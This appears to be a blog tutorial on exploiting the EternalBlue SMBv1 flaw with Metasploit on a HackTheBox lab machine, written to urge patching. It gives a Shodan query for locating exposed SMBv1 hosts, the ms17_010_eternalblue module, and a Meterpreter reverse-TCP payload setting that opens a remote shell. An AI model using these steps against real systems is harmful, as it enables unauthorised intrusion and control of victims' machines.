If you have heard of WannaCry or NotPetya, you have most likely heard of EternalBlue.
EternalBlue exploits the flaws in the SMBv1 protocol. Although it was patched back in 2017, it’s still at large today. Below is an example taken from Shodan.io.
This is a simple guide to show how easy an attacker can exploit this vulnerability using Metasploit. Hopefully it will highlight why you need to patch those systems asap. Just to note, the system that I exploited was part of HackTheBox.eu.
Msfconsole will already been installed and setup if you are running Kali or Parrot OS.
Here you can use a range of tools to identify your target and find a vulnerable system.
Metasploit exploits directory: /usr/share/metasploit-framework/modules/exploits
If you are using Shodan, you can use the follow query:
port:445 “SMB Version: 1” os:Windows !product:Samba
*Remember that if you exploit machines you have found on Shodan, you will be breaking the law.
Once you have span up Metasploit by using msfconsole, you could use the SMB Scanner to scan your target to verify the version:
Once you have your target, the next step is to use the exploit. You can find EternalBlue exploits using the ExploitDB: https://www.exploit-db.com/
For this example, we will use ms17_010_eternalblue…
You will need to set the target using set rhost [Target IP]
If successful, you will have yourself a shell….
If not, you might need to set the payload like so: set payload windows/x64/meterpreter/reverse_tcp
And that’s it. Pretty simple right?
If you are viewing this and you have vulnerable systems of your own, please do patch or remediate the threat in other ways.